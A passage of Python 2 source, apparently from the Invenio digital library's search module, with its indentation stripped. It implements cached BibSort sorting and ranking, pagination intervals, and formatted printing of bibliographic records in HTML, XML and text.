where id_bsrMETHOD = %s""", (method_id,))
res_buckets = run_sql("""SELECT bucket_no, bucket_data from bsrMETHODDATABUCKET\
where id_bsrMETHOD = %s""", (method_id,))
except Exception:
# database problems, return empty cache
return {}
try:
data_dict_ordered = deserialize_via_marshal(res_data[0][0])
except:
data_dict_ordered = {}
alldicts['data_dict_ordered'] = data_dict_ordered # recid: weight
if not res_buckets:
alldicts['bucket_data'] = {}
return alldicts
for row in res_buckets:
bucket_no = row[0]
try:
bucket_data = intbitset(row[1])
except:
bucket_data = intbitset([])
alldicts.setdefault('bucket_data', {})[bucket_no] = bucket_data
return alldicts
def timestamp_verifier():
method_id = self.method_id
res = run_sql("""SELECT last_updated from bsrMETHODDATA where id_bsrMETHOD = %s""", (method_id,))
try:
update_time_methoddata = str(res[0][0])
except IndexError:
update_time_methoddata = '1970-01-01 00:00:00'
res = run_sql("""SELECT max(last_updated) from bsrMETHODDATABUCKET where id_bsrMETHOD = %s""", (method_id,))
try:
update_time_buckets = str(res[0][0])
except IndexError:
update_time_buckets = '1970-01-01 00:00:00'
return max(update_time_methoddata, update_time_buckets)
DataCacher.__init__(self, cache_filler, timestamp_verifier)
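# A BibSortDataCacher cache ends up as a dict of roughly this shape (recids,
# weights and bucket numbers below are made up):
#
#     {'data_dict_ordered': {10: 1, 11: 2, 12: 3},   # recid -> sort weight
#      'bucket_data': {1: intbitset([10, 11]),       # bucket no -> recids
#                      2: intbitset([12])}}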
def get_sorting_methods():
if not CFG_BIBSORT_BUCKETS: # we do not want to use buckets
return {}
try: # make sure the method has some data
res = run_sql("""SELECT m.name, m.definition FROM bsrMETHOD m, bsrMETHODDATA md WHERE m.id = md.id_bsrMETHOD""")
except:
return {}
return dict(res)
sorting_methods = get_sorting_methods()
cache_sorted_data = {}
for sorting_method in sorting_methods:
try:
cache_sorted_data[sorting_method].is_ok_p
except Exception:
cache_sorted_data[sorting_method] = BibSortDataCacher(sorting_method)
def get_tags_from_sort_fields(sort_fields):
"""Given a list of sort_fields, return the tags associated with it and
also the name of the field that has no tags associated, to be able to
display a message to the user."""
tags = []
if not sort_fields:
return [], ''
for sort_field in sort_fields:
if sort_field and str(sort_field[0:2]).isdigit():
# sort_field starts by two digits, so this is probably a MARC tag already
tags.append(sort_field)
else:
# let us check the 'field' table
field_tags = get_field_tags(sort_field)
if field_tags:
tags.extend(field_tags)
else:
return [], sort_field
return tags, ''
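# Hedged sketch of get_tags_from_sort_fields (tag values depend on the local
# 'field'/'tag' configuration and are only illustrative):
#
#     get_tags_from_sort_fields(['author'])       # -> (['100__a', '700__a'], '')
#     get_tags_from_sort_fields(['100__a'])       # -> (['100__a'], '')
#     get_tags_from_sort_fields(['nosuchfield'])  # -> ([], 'nosuchfield')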
def rank_records(req, rank_method_code, rank_limit_relevance, hitset_global, pattern=None, verbose=0, sort_order='d', of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None, field=''):
"""Initial entry point for ranking records, acts like a dispatcher.
(i) rank_method_code is in bsrMETHOD, bibsort buckets can be used;
    (ii) rank_method_code is not in bsrMETHOD, use bibrank;
"""
if CFG_BIBSORT_BUCKETS and sorting_methods:
for sort_method in sorting_methods:
definition = sorting_methods[sort_method]
if definition.startswith('RNK') and \
definition.replace('RNK:','').strip().lower() == string.lower(rank_method_code):
(solution_recs, solution_scores) = sort_records_bibsort(req, hitset_global, sort_method, '', sort_order, verbose, of, ln, rg, jrec, 'r')
#return (solution_recs, solution_scores, '', '', '')
comment = ''
if verbose > 0:
comment = 'find_citations retlist %s' % [[solution_recs[i], solution_scores[i]] for i in range(len(solution_recs))]
return (solution_recs, solution_scores, '(', ')', comment)
return rank_records_bibrank(rank_method_code, rank_limit_relevance, hitset_global, pattern, verbose, field, rg, jrec)
def sort_records(req, recIDs, sort_field='', sort_order='d', sort_pattern='', verbose=0, of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None):
"""Initial entry point for sorting records, acts like a dispatcher.
(i) sort_field is in the bsrMETHOD, and thus, the BibSort has sorted the data for this field, so we can use the cache;
    (ii) sort_field is not in bsrMETHOD, and thus the cache does not contain any information regarding this sorting method"""
_ = gettext_set_language(ln)
#we should return sorted records up to irec_max(exclusive)
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs), jrec, rg)
#calculate the min index on the reverted list
index_min = max(len(recIDs) - irec_max, 0) #just to be sure that the min index is not negative
#bibsort does not handle sort_pattern for now, use bibxxx
if sort_pattern:
return sort_records_bibxxx(req, recIDs, None, sort_field, sort_order, sort_pattern, verbose, of, ln, rg, jrec)
use_sorting_buckets = True
if not CFG_BIBSORT_BUCKETS or not sorting_methods: #ignore the use of buckets, use old fashion sorting
use_sorting_buckets = False
if not sort_field:
if use_sorting_buckets:
return sort_records_bibsort(req, recIDs, 'latest first', sort_field, sort_order, verbose, of, ln, rg, jrec)
else:
return recIDs[index_min:]
sort_fields = string.split(sort_field, ",")
if len(sort_fields) == 1:
# we have only one sorting_field, check if it is treated by BibSort
for sort_method in sorting_methods:
definition = sorting_methods[sort_method]
if use_sorting_buckets and \
((definition.startswith('FIELD') and \
definition.replace('FIELD:','').strip().lower() == string.lower(sort_fields[0])) or \
sort_method == sort_fields[0]):
#use BibSort
return sort_records_bibsort(req, recIDs, sort_method, sort_field, sort_order, verbose, of, ln, rg, jrec)
#deduce sorting MARC tag out of the 'sort_field' argument:
tags, error_field = get_tags_from_sort_fields(sort_fields)
if error_field:
if use_sorting_buckets:
return sort_records_bibsort(req, recIDs, 'latest first', sort_field, sort_order, verbose, of, ln, rg, jrec)
else:
if of.startswith('h'):
write_warning(_("Sorry, %s does not seem to be a valid sort option. The records will not be sorted.") % cgi.escape(error_field), "Error", req=req)
return recIDs[index_min:]
if tags:
for sort_method in sorting_methods:
definition = sorting_methods[sort_method]
if definition.startswith('MARC') \
and definition.replace('MARC:','').strip().split(',') == tags \
and use_sorting_buckets:
#this list of tags have a designated method in BibSort, so use it
return sort_records_bibsort(req, recIDs, sort_method, sort_field, sort_order, verbose, of, ln, rg, jrec)
#we do not have this sort_field in BibSort tables -> do the old fashion sorting
return sort_records_bibxxx(req, recIDs, tags, sort_field, sort_order, sort_pattern, verbose, of, ln, rg, jrec)
return recIDs[index_min:]
def sort_records_bibsort(req, recIDs, sort_method, sort_field='', sort_order='d', verbose=0, of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None, sort_or_rank = 's'):
"""This function orders the recIDs list, based on a sorting method(sort_field) using the BibSortDataCacher for speed"""
_ = gettext_set_language(ln)
#sanity check
if sort_method not in sorting_methods:
if sort_or_rank == 'r':
return rank_records_bibrank(sort_method, 0, recIDs, None, verbose)
else:
return sort_records_bibxxx(req, recIDs, None, sort_field, sort_order, '', verbose, of, ln, rg, jrec)
if verbose >= 3 and of.startswith('h'):
write_warning("Sorting (using BibSort cache) by method %s (definition %s)." \
% (cgi.escape(repr(sort_method)), cgi.escape(repr(sorting_methods[sort_method]))), req=req)
#we should return sorted records up to irec_max(exclusive)
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs), jrec, rg)
solution = intbitset([])
input_recids = intbitset(recIDs)
cache_sorted_data[sort_method].recreate_cache_if_needed()
sort_cache = cache_sorted_data[sort_method].cache
bucket_numbers = sort_cache['bucket_data'].keys()
#check if all buckets have been constructed
if len(bucket_numbers) != CFG_BIBSORT_BUCKETS:
if verbose > 3 and of.startswith('h'):
write_warning("Not all buckets have been constructed.. switching to old fashion sorting.", req=req)
if sort_or_rank == 'r':
return rank_records_bibrank(sort_method, 0, recIDs, None, verbose)
else:
return sort_records_bibxxx(req, recIDs, None, sort_field, sort_order, '', verbose, of, ln, rg, jrec)
if sort_order == 'd':
bucket_numbers.reverse()
for bucket_no in bucket_numbers:
solution.union_update(input_recids & sort_cache['bucket_data'][bucket_no])
if len(solution) >= irec_max:
break
dict_solution = {}
missing_records = []
for recid in solution:
try:
dict_solution[recid] = sort_cache['data_dict_ordered'][recid]
except KeyError:
#recid is in buckets, but not in the bsrMETHODDATA,
#maybe because the value has been deleted, but the change has not yet been propagated to the buckets
missing_records.append(recid)
#check if there are recids that are not in any bucket -> to be added at the end/top, ordered by insertion date
if len(solution) < irec_max:
#some records have not been yet inserted in the bibsort structures
#or, some records have no value for the sort_method
missing_records = sorted(missing_records + list(input_recids.difference(solution)))
#the records need to be sorted in reverse order for the print record function
#the return statement should be equivalent with the following statements
#(these are clearer, but less efficient, since they revert the same list twice)
#sorted_solution = (missing_records + sorted(dict_solution, key=dict_solution.__getitem__, reverse=sort_order=='d'))[:irec_max]
#sorted_solution.reverse()
#return sorted_solution
if sort_method.strip().lower().startswith('latest') and sort_order == 'd':
        # if we want to sort the records on their insertion date, add the missing records at the top
solution = sorted(dict_solution, key=dict_solution.__getitem__, reverse=sort_order=='a') + missing_records
else:
solution = missing_records + sorted(dict_solution, key=dict_solution.__getitem__, reverse=sort_order=='a')
#calculate the min index on the reverted list
index_min = max(len(solution) - irec_max, 0) #just to be sure that the min index is not negative
#return all the records up to irec_max, but on the reverted list
if sort_or_rank == 'r':
# we need the recids, with values
return (solution[index_min:], [dict_solution.get(record, 0) for record in solution[index_min:]])
else:
return solution[index_min:]
def sort_records_bibxxx(req, recIDs, tags, sort_field='', sort_order='d', sort_pattern='', verbose=0, of='hb', ln=CFG_SITE_LANG, rg=None, jrec=None):
"""OLD FASHION SORTING WITH NO CACHE, for sort fields that are not run in BibSort
Sort records in 'recIDs' list according sort field 'sort_field' in order 'sort_order'.
If more than one instance of 'sort_field' is found for a given record, try to choose that that is given by
'sort pattern', for example "sort by report number that starts by CERN-PS".
Note that 'sort_field' can be field code like 'author' or MARC tag like '100__a' directly."""
_ = gettext_set_language(ln)
#we should return sorted records up to irec_max(exclusive)
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs), jrec, rg)
#calculate the min index on the reverted list
index_min = max(len(recIDs) - irec_max, 0) #just to be sure that the min index is not negative
## check arguments:
if not sort_field:
return recIDs[index_min:]
if len(recIDs) > CFG_WEBSEARCH_NB_RECORDS_TO_SORT:
if of.startswith('h'):
write_warning(_("Sorry, sorting is allowed on sets of up to %d records only. Using default sort order.") % CFG_WEBSEARCH_NB_RECORDS_TO_SORT, "Warning", req=req)
return recIDs[index_min:]
recIDs_dict = {}
recIDs_out = []
if not tags:
        # tags have not been computed yet
sort_fields = string.split(sort_field, ",")
tags, error_field = get_tags_from_sort_fields(sort_fields)
if error_field:
if of.startswith('h'):
write_warning(_("Sorry, %s does not seem to be a valid sort option. The records will not be sorted.") % cgi.escape(error_field), "Error", req=req)
return recIDs[index_min:]
if verbose >= 3 and of.startswith('h'):
write_warning("Sorting by tags %s." % cgi.escape(repr(tags)), req=req)
if sort_pattern:
write_warning("Sorting preferentially by %s." % cgi.escape(sort_pattern), req=req)
## check if we have sorting tag defined:
if tags:
# fetch the necessary field values:
for recID in recIDs:
val = "" # will hold value for recID according to which sort
vals = [] # will hold all values found in sorting tag for recID
for tag in tags:
if CFG_CERN_SITE and tag == '773__c':
# CERN hack: journal sorting
# 773__c contains page numbers, e.g. 3-13, and we want to sort by 3, and numerically:
vals.extend(["%050s" % x.split("-", 1)[0] for x in get_fieldvalues(recID, tag)])
else:
vals.extend(get_fieldvalues(recID, tag))
if sort_pattern:
# try to pick that tag value that corresponds to sort pattern
bingo = 0
for v in vals:
if v.lower().startswith(sort_pattern.lower()): # bingo!
bingo = 1
val = v
break
if not bingo: # sort_pattern not present, so add other vals after spaces
val = sort_pattern + " " + string.join(vals)
else:
# no sort pattern defined, so join them all together
val = string.join(vals)
val = strip_accents(val.lower()) # sort values regardless of accents and case
if recIDs_dict.has_key(val):
recIDs_dict[val].append(recID)
else:
recIDs_dict[val] = [recID]
# sort them:
recIDs_dict_keys = recIDs_dict.keys()
recIDs_dict_keys.sort()
# now that keys are sorted, create output array:
for k in recIDs_dict_keys:
for s in recIDs_dict[k]:
recIDs_out.append(s)
# ascending or descending?
if sort_order == 'a':
recIDs_out.reverse()
# okay, we are done
# return only up to the maximum that we need to sort
if len(recIDs_out) != len(recIDs):
dummy, irec_max = get_interval_for_records_to_sort(len(recIDs_out), jrec, rg)
index_min = max(len(recIDs_out) - irec_max, 0) #just to be sure that the min index is not negative
return recIDs_out[index_min:]
else:
# good, no sort needed
return recIDs[index_min:]
def get_interval_for_records_to_sort(nb_found, jrec=None, rg=None):
"""calculates in which interval should the sorted records be
a value of 'rg=-9999' means to print all records: to be used with care."""
if not jrec:
jrec = 1
if not rg:
#return all
return jrec-1, nb_found
if rg == -9999: # print all records
rg = nb_found
else:
rg = abs(rg)
if jrec < 1: # sanity checks
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
# will sort records from irec_min to irec_max excluded
irec_min = jrec - 1
irec_max = irec_min + rg
if irec_min < 0:
irec_min = 0
if irec_max > nb_found:
irec_max = nb_found
return irec_min, irec_max
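# Illustrative examples (not from the original source): with nb_found=100, jrec=21, rg=10 this
# returns (20, 30); with rg=-9999 it returns (20, 100), i.e. everything from jrec onwards.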
def print_records(req, recIDs, jrec=1, rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, format='hb', ot='', ln=CFG_SITE_LANG,
relevances=[], relevances_prologue="(", relevances_epilogue="%%)",
decompress=zlib.decompress, search_pattern='', print_records_prologue_p=True,
print_records_epilogue_p=True, verbose=0, tab='', sf='', so='d', sp='',
rm='', em=''):
"""
Prints list of records 'recIDs' formatted according to 'format' in
groups of 'rg' starting from 'jrec'.
Assumes that the input list 'recIDs' is sorted in reverse order,
so it counts records from tail to head.
A value of 'rg=-9999' means to print all records: to be used with care.
Print also list of RELEVANCES for each record (if defined), in
between RELEVANCE_PROLOGUE and RELEVANCE_EPILOGUE.
Print prologue and/or epilogue specific to 'format' if
'print_records_prologue_p' and/or 'print_records_epilogue_p' are
True.
'sf' is sort field and 'rm' is ranking method that are passed here
only for proper linking purposes: e.g. when a certain ranking
method or a certain sort field was selected, keep it selected in
any dynamic search links that may be printed.
"""
if em != "" and EM_REPOSITORY["body"] not in em:
return
# load the right message language
_ = gettext_set_language(ln)
# sanity checking:
if req is None:
return
# get user_info (for formatting based on user)
if isinstance(req, cStringIO.OutputType):
user_info = {}
else:
user_info = collect_user_info(req)
if len(recIDs):
nb_found = len(recIDs)
if rg == -9999: # print all records
rg = nb_found
else:
rg = abs(rg)
if jrec < 1: # sanity checks
jrec = 1
if jrec > nb_found:
jrec = max(nb_found-rg+1, 1)
# will print records from irec_max to irec_min excluded:
irec_max = nb_found - jrec
irec_min = nb_found - jrec - rg
if irec_min < 0:
irec_min = -1
if irec_max >= nb_found:
irec_max = nb_found - 1
#req.write("%s:%d-%d" % (recIDs, irec_min, irec_max))
if format.startswith('x'):
# print header if needed
if print_records_prologue_p:
print_records_prologue(req, format)
# print records
recIDs_to_print = [recIDs[x] for x in range(irec_max, irec_min, -1)]
if ot:
# asked to print some filtered fields only, so call print_record() on the fly:
for irec in range(irec_max, irec_min, -1):
x = print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm)
req.write(x)
if x:
req.write('\n')
else:
format_records(recIDs_to_print,
format,
ln=ln,
search_pattern=search_pattern,
record_separator="\n",
user_info=user_info,
req=req)
# print footer if needed
if print_records_epilogue_p:
print_records_epilogue(req, format)
elif format.startswith('t') or str(format[0:3]).isdigit():
# we are doing plain text output:
for irec in range(irec_max, irec_min, -1):
x = print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm)
req.write(x)
if x:
req.write('\n')
elif format == 'excel':
recIDs_to_print = [recIDs[x] for x in range(irec_max, irec_min, -1)]
create_excel(recIDs=recIDs_to_print, req=req, ln=ln, ot=ot, user_info=user_info)
else:
# we are doing HTML output:
if format == 'hp' or format.startswith("hb_") or format.startswith("hd_"):
# portfolio and on-the-fly formats:
for irec in range(irec_max, irec_min, -1):
req.write(print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm))
elif format.startswith("hb"):
# HTML brief format:
display_add_to_basket = True
if user_info:
if user_info['email'] == 'guest':
if CFG_ACCESS_CONTROL_LEVEL_ACCOUNTS > 4:
display_add_to_basket = False
else:
if not user_info['precached_usebaskets']:
display_add_to_basket = False
if em != "" and EM_REPOSITORY["basket"] not in em:
display_add_to_basket = False
req.write(websearch_templates.tmpl_record_format_htmlbrief_header(
ln = ln))
for irec in range(irec_max, irec_min, -1):
row_number = jrec+irec_max-irec
recid = recIDs[irec]
if relevances and relevances[irec]:
relevance = relevances[irec]
else:
relevance = ''
record = print_record(recIDs[irec], format, ot, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm)
req.write(websearch_templates.tmpl_record_format_htmlbrief_body(
ln = ln,
recid = recid,
row_number = row_number,
relevance = relevance,
record = record,
relevances_prologue = relevances_prologue,
relevances_epilogue = relevances_epilogue,
display_add_to_basket = display_add_to_basket
))
req.write(websearch_templates.tmpl_record_format_htmlbrief_footer(
ln = ln,
display_add_to_basket = display_add_to_basket))
elif format.startswith("hd"):
# HTML detailed format:
for irec in range(irec_max, irec_min, -1):
if record_exists(recIDs[irec]) == -1:
write_warning(_("The record has been deleted."), req=req)
merged_recid = get_merged_recid(recIDs[irec])
if merged_recid:
write_warning(_("The record %d replaces it." % merged_recid), req=req)
continue
unordered_tabs = get_detailed_page_tabs(get_colID(guess_primary_collection_of_a_record(recIDs[irec])),
recIDs[irec], ln=ln)
ordered_tabs_id = [(tab_id, values['order']) for (tab_id, values) in unordered_tabs.iteritems()]
ordered_tabs_id.sort(lambda x, y: cmp(x[1], y[1]))
link_ln = ''
if ln != CFG_SITE_LANG:
link_ln = '?ln=%s' % ln
recid = recIDs[irec]
recid_to_display = recid # Record ID used to build the URL.
if CFG_WEBSEARCH_USE_ALEPH_SYSNOS:
try:
recid_to_display = get_fieldvalues(recid,
CFG_BIBUPLOAD_EXTERNAL_SYSNO_TAG)[0]
except IndexError:
# No external sysno is available, keep using
# internal recid.
pass
tabs = [(unordered_tabs[tab_id]['label'], \
'%s/%s/%s/%s%s' % (CFG_SITE_URL, CFG_SITE_RECORD, recid_to_display, tab_id, link_ln), \
tab_id == tab,
unordered_tabs[tab_id]['enabled']) \
for (tab_id, order) in ordered_tabs_id
if unordered_tabs[tab_id]['visible'] == True]
tabs_counts = get_detailed_page_tabs_counts(recid)
citedbynum = tabs_counts['Citations']
references = tabs_counts['References']
discussions = tabs_counts['Discussions']
# load content
if tab == 'usage':
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln,
citationnum=citedbynum,
referencenum=references,
discussionnum=discussions))
r = calculate_reading_similarity_list(recIDs[irec], "downloads")
downloadsimilarity = None
downloadhistory = None
#if r:
# downloadsimilarity = r
if CFG_BIBRANK_SHOW_DOWNLOAD_GRAPHS:
downloadhistory = create_download_history_graph_and_box(recIDs[irec], ln)
r = calculate_reading_similarity_list(recIDs[irec], "pageviews")
viewsimilarity = None
if r: viewsimilarity = r
content = websearch_templates.tmpl_detailed_record_statistics(recIDs[irec],
ln,
downloadsimilarity=downloadsimilarity,
downloadhistory=downloadhistory,
viewsimilarity=viewsimilarity)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln))
elif tab == 'citations':
recid = recIDs[irec]
req.write(webstyle_templates.detailed_record_container_top(recid,
tabs,
ln,
citationnum=citedbynum,
referencenum=references,
discussionnum=discussions))
req.write(websearch_templates.tmpl_detailed_record_citations_prologue(recid, ln))
# Citing
citinglist = calculate_cited_by_list(recid)
req.write(websearch_templates.tmpl_detailed_record_citations_citing_list(recid,
ln,
citinglist,
sf=sf,
so=so,
sp=sp,
rm=rm))
# Self-cited
selfcited = get_self_cited_by(recid)
req.write(websearch_templates.tmpl_detailed_record_citations_self_cited(recid,
ln, selfcited=selfcited, citinglist=citinglist))
# Co-cited
s = calculate_co_cited_with_list(recid)
cociting = None
if s:
cociting = s
req.write(websearch_templates.tmpl_detailed_record_citations_co_citing(recid,
ln,
cociting=cociting))
# Citation history, if needed
citationhistory = None
if citinglist:
citationhistory = create_citation_history_graph_and_box(recid, ln)
#debug
if verbose > 3:
write_warning("Citation graph debug: " + \
str(len(citationhistory)), req=req)
req.write(websearch_templates.tmpl_detailed_record_citations_citation_history(recid, ln, citationhistory))
req.write(websearch_templates.tmpl_detailed_record_citations_epilogue(recid, ln))
req.write(webstyle_templates.detailed_record_container_bottom(recid,
tabs,
ln))
elif tab == 'references':
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln,
citationnum=citedbynum,
referencenum=references,
discussionnum=discussions))
req.write(format_record(recIDs[irec], 'HDREF', ln=ln, user_info=user_info, verbose=verbose))
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln))
elif tab == 'keywords':
from invenio.bibclassify_webinterface import \
record_get_keywords, write_keywords_body, \
generate_keywords
from invenio.webinterface_handler import wash_urlargd
form = req.form
argd = wash_urlargd(form, {
'generate': (str, 'no'),
'sort': (str, 'occurrences'),
'type': (str, 'tagcloud'),
'numbering': (str, 'off'),
})
recid = recIDs[irec]
req.write(webstyle_templates.detailed_record_container_top(recid,
tabs,
ln))
content = websearch_templates.tmpl_record_plots(recID=recid,
ln=ln)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recid,
tabs,
ln))
req.write(webstyle_templates.detailed_record_container_top(recid,
tabs, ln, citationnum=citedbynum, referencenum=references))
if argd['generate'] == 'yes':
# The user asked to generate the keywords.
keywords = generate_keywords(req, recid, argd)
else:
# Get the keywords contained in the MARC.
keywords = record_get_keywords(recid, argd)
if argd['sort'] == 'related' and not keywords:
req.write('You may want to run BibIndex.')
# Output the keywords or the generate button.
write_keywords_body(keywords, req, recid, argd)
req.write(webstyle_templates.detailed_record_container_bottom(recid,
tabs, ln))
elif tab == 'plots':
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln))
content = websearch_templates.tmpl_record_plots(recID=recIDs[irec],
ln=ln)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln))
else:
# Metadata tab
req.write(webstyle_templates.detailed_record_container_top(recIDs[irec],
tabs,
ln,
show_short_rec_p=False,
citationnum=citedbynum, referencenum=references,
discussionnum=discussions))
creationdate = None
modificationdate = None
if record_exists(recIDs[irec]) == 1:
creationdate = get_creation_date(recIDs[irec])
modificationdate = get_modification_date(recIDs[irec])
content = print_record(recIDs[irec], format, ot, ln,
search_pattern=search_pattern,
user_info=user_info, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm)
content = websearch_templates.tmpl_detailed_record_metadata(
recID = recIDs[irec],
ln = ln,
format = format,
creationdate = creationdate,
modificationdate = modificationdate,
content = content)
# display of the next-hit/previous-hit/back-to-search links
# on the detailed record pages
content += websearch_templates.tmpl_display_back_to_search(req,
recIDs[irec],
ln)
req.write(content)
req.write(webstyle_templates.detailed_record_container_bottom(recIDs[irec],
tabs,
ln,
creationdate=creationdate,
modificationdate=modificationdate,
show_short_rec_p=False))
if len(tabs) > 0:
# Add the mini box at bottom of the page
if CFG_WEBCOMMENT_ALLOW_REVIEWS:
from invenio.webcomment import get_mini_reviews
reviews = get_mini_reviews(recid = recIDs[irec], ln=ln)
else:
reviews = ''
actions = format_record(recIDs[irec], 'HDACT', ln=ln, user_info=user_info, verbose=verbose)
files = format_record(recIDs[irec], 'HDFILE', ln=ln, user_info=user_info, verbose=verbose)
req.write(webstyle_templates.detailed_record_mini_panel(recIDs[irec],
ln,
format,
files=files,
reviews=reviews,
actions=actions))
else:
# Other formats
for irec in range(irec_max, irec_min, -1):
req.write(print_record(recIDs[irec], format, ot, ln,
search_pattern=search_pattern,
user_info=user_info, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm))
else:
write_warning(_("Use different search terms."), req=req)
def print_records_prologue(req, format, cc=None):
"""
Print the appropriate prologue for list of records in the given
format.
"""
prologue = "" # no prologue needed for HTML or Text formats
if format.startswith('xm'):
prologue = websearch_templates.tmpl_xml_marc_prologue()
elif format.startswith('xn'):
prologue = websearch_templates.tmpl_xml_nlm_prologue()
elif format.startswith('xw'):
prologue = websearch_templates.tmpl_xml_refworks_prologue()
elif format.startswith('xr'):
prologue = websearch_templates.tmpl_xml_rss_prologue(cc=cc)
elif format.startswith('xe8x'):
prologue = websearch_templates.tmpl_xml_endnote_8x_prologue()
elif format.startswith('xe'):
prologue = websearch_templates.tmpl_xml_endnote_prologue()
elif format.startswith('xo'):
prologue = websearch_templates.tmpl_xml_mods_prologue()
elif format.startswith('xp'):
prologue = websearch_templates.tmpl_xml_podcast_prologue(cc=cc)
elif format.startswith('x'):
prologue = websearch_templates.tmpl_xml_default_prologue()
req.write(prologue)
def print_records_epilogue(req, format):
"""
Print the appropriate epilogue for list of records in the given
format.
"""
epilogue = "" # no epilogue needed for HTML or Text formats
if format.startswith('xm'):
epilogue = websearch_templates.tmpl_xml_marc_epilogue()
elif format.startswith('xn'):
epilogue = websearch_templates.tmpl_xml_nlm_epilogue()
elif format.startswith('xw'):
epilogue = websearch_templates.tmpl_xml_refworks_epilogue()
elif format.startswith('xr'):
epilogue = websearch_templates.tmpl_xml_rss_epilogue()
elif format.startswith('xe8x'):
epilogue = websearch_templates.tmpl_xml_endnote_8x_epilogue()
elif format.startswith('xe'):
epilogue = websearch_templates.tmpl_xml_endnote_epilogue()
elif format.startswith('xo'):
epilogue = websearch_templates.tmpl_xml_mods_epilogue()
elif format.startswith('xp'):
epilogue = websearch_templates.tmpl_xml_podcast_epilogue()
elif format.startswith('x'):
epilogue = websearch_templates.tmpl_xml_default_epilogue()
req.write(epilogue)
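# Illustrative pairing (assumption about the templates): for format 'xm' the prologue and epilogue
# above emit the opening and closing <collection> element, so callers must always print both around
# the individual print_record() outputs to obtain well-formed MARCXML.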
def get_record(recid):
"""Directly the record object corresponding to the recid."""
if CFG_BIBUPLOAD_SERIALIZE_RECORD_STRUCTURE:
value = run_sql("SELECT value FROM bibfmt WHERE id_bibrec=%s AND FORMAT='recstruct'", (recid, ))
if value:
try:
return deserialize_via_marshal(value[0][0])
except:
### In case of corruption, let's rebuild it!
pass
return create_record(print_record(recid, 'xm'))[0]
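# Example usage (illustrative): rec = get_record(10) yields the bibrecord structure that
# record_xml_output() and the other invenio.bibrecord helpers operate on.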
def print_record(recID, format='hb', ot='', ln=CFG_SITE_LANG, decompress=zlib.decompress,
search_pattern=None, user_info=None, verbose=0, sf='', so='d',
sp='', rm='', brief_links=True):
"""
Prints record 'recID' formatted according to 'format'.
'sf' is sort field and 'rm' is ranking method that are passed here
only for proper linking purposes: e.g. when a certain ranking
method or a certain sort field was selected, keep it selected in
any dynamic search links that may be printed.
"""
if format == 'recstruct':
return get_record(recID)
_ = gettext_set_language(ln)
display_claim_this_paper = False
try:
display_claim_this_paper = user_info["precached_viewclaimlink"]
except (KeyError, TypeError):
display_claim_this_paper = False
#check from user information if the user has the right to see hidden fields/tags in the
#records as well
can_see_hidden = False
if user_info:
can_see_hidden = user_info.get('precached_canseehiddenmarctags', False)
out = ""
# sanity check:
record_exist_p = record_exists(recID)
if record_exist_p == 0: # doesn't exist
return out
# New Python BibFormat procedure for formatting
# Old procedure follows further below
# We must still check some special formats, but these
# should disappear when BibFormat improves.
if not (CFG_BIBFORMAT_USE_OLD_BIBFORMAT \
or format.lower().startswith('t') \
or format.lower().startswith('hm') \
or str(format[0:3]).isdigit() \
or ot):
# Unspecified format is hd
if format == '':
format = 'hd'
if record_exist_p == -1 and get_output_format_content_type(format) == 'text/html':
# HTML output displays a default value for deleted records.
# Other formats have to deal with it.
out += _("The record has been deleted.")
# was record deleted-but-merged ?
merged_recid = get_merged_recid(recID)
if merged_recid:
out += ' ' + _("The record %d replaces it." % merged_recid)
else:
out += call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
# at the end of HTML brief mode, print the "Detailed record" functionality:
if brief_links and format.lower().startswith('hb') and \
format.lower() != 'hb_p':
out += websearch_templates.tmpl_print_record_brief_links(ln=ln,
recID=recID,
sf=sf,
so=so,
sp=sp,
rm=rm,
display_claim_link=display_claim_this_paper)
return out
# Old PHP BibFormat procedure for formatting
# print record opening tags, if needed:
if format == "marcxml" or format == "oai_dc":
out += " <record>\n"
out += " <header>\n"
for oai_id in get_fieldvalues(recID, CFG_OAI_ID_FIELD):
out += " <identifier>%s</identifier>\n" % oai_id
out += " <datestamp>%s</datestamp>\n" % get_modification_date(recID)
out += " </header>\n"
out += " <metadata>\n"
if format.startswith("xm") or format == "marcxml":
# look for detailed format existence:
query = "SELECT value FROM bibfmt WHERE id_bibrec=%s AND format=%s"
res = run_sql(query, (recID, format), 1)
if res and record_exist_p == 1 and not ot:
# record 'recID' is formatted in 'format', and we are not
# asking for field-filtered output; so print it:
out += "%s" % decompress(res[0][0])
elif ot:
# field-filtered output was asked for; print only some fields
if not can_see_hidden:
ot = list(set(ot) - set(CFG_BIBFORMAT_HIDDEN_TAGS))
out += record_xml_output(get_record(recID), ot)
else:
# record 'recID' is not formatted in 'format' or we ask
# for field-filtered output -- they are not in "bibfmt"
# table; so fetch all the data from "bibXXx" tables:
if format == "marcxml":
out += """ <record xmlns="http://www.loc.gov/MARC21/slim">\n"""
out += " <controlfield tag=\"001\">%d</controlfield>\n" % int(recID)
elif format.startswith("xm"):
out += """ <record>\n"""
out += " <controlfield tag=\"001\">%d</controlfield>\n" % int(recID)
if record_exist_p == -1:
# deleted record, so display only OAI ID and 980:
